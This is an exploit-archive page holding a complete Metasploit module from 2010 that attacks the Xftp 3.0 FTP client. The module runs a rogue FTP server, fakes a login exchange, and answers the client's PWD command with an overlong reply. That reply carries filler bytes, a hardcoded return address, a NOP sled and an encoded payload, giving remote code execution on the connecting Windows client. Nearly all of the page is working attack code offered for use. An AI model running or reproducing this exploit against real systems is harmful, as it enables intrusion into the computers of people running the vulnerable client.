what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit

Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit
Posted Apr 27, 2010
Authored by zombiefx | Site metasploit.com

This Metasploit module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered through an excessively long PWD message.

tags | exploit, overflow
SHA-256 | ab255e702c98e4c4b3070e23514c2356e3288bdfacac985442228143c26206ee

Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit

Change Mirror Download
##
# $Id: xftp_client_pwd.rb 9143 2010-04-26 18:56:46Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::TcpServer

def initialize(info = {})
super(update_info(info,
'Name' => 'Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit',
'Description' => %q{
This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered
through an excessively long PWD message.
},
'Author' =>
[
'zombiefx', # Original exploit author
'dookie' # MSF module author
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9143 $',
'References' =>
[
[ 'OSVDB', '63968'],
[ 'URL', 'http://www.exploit-db.com/exploits/12332' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 434,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x100123AF } ], # JMP ECX in nslicense.dll
],
'Privileged' => false,
'DisclosureDate' => 'Apr 22 2010',
'DefaultTarget' => 0))

register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
], self.class)
end

def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)

buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
client.put(buffer)
end

def on_client_data(client)

# Get the client username
client.get_once

# Prompt the client for the password.
user = "331 Anonymous access allowed.\r\n"
client.put(user)
client.get_once

# Handle the clients PWD command.
pass = "230 Login successful.\r\n230 User logged in.\r\n"
client.put(pass)
client.get_once

# Send the exploit
sploit = "257 \"/"
sploit << rand_text_alpha_upper(1019)
sploit << [ target.ret ].pack('V')
sploit << make_nops(55)
sploit << payload.encoded
sploit << "\" is current directory.\r\n"

client.put(sploit)

# Get the CWD from the client
client.get_once

end

end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close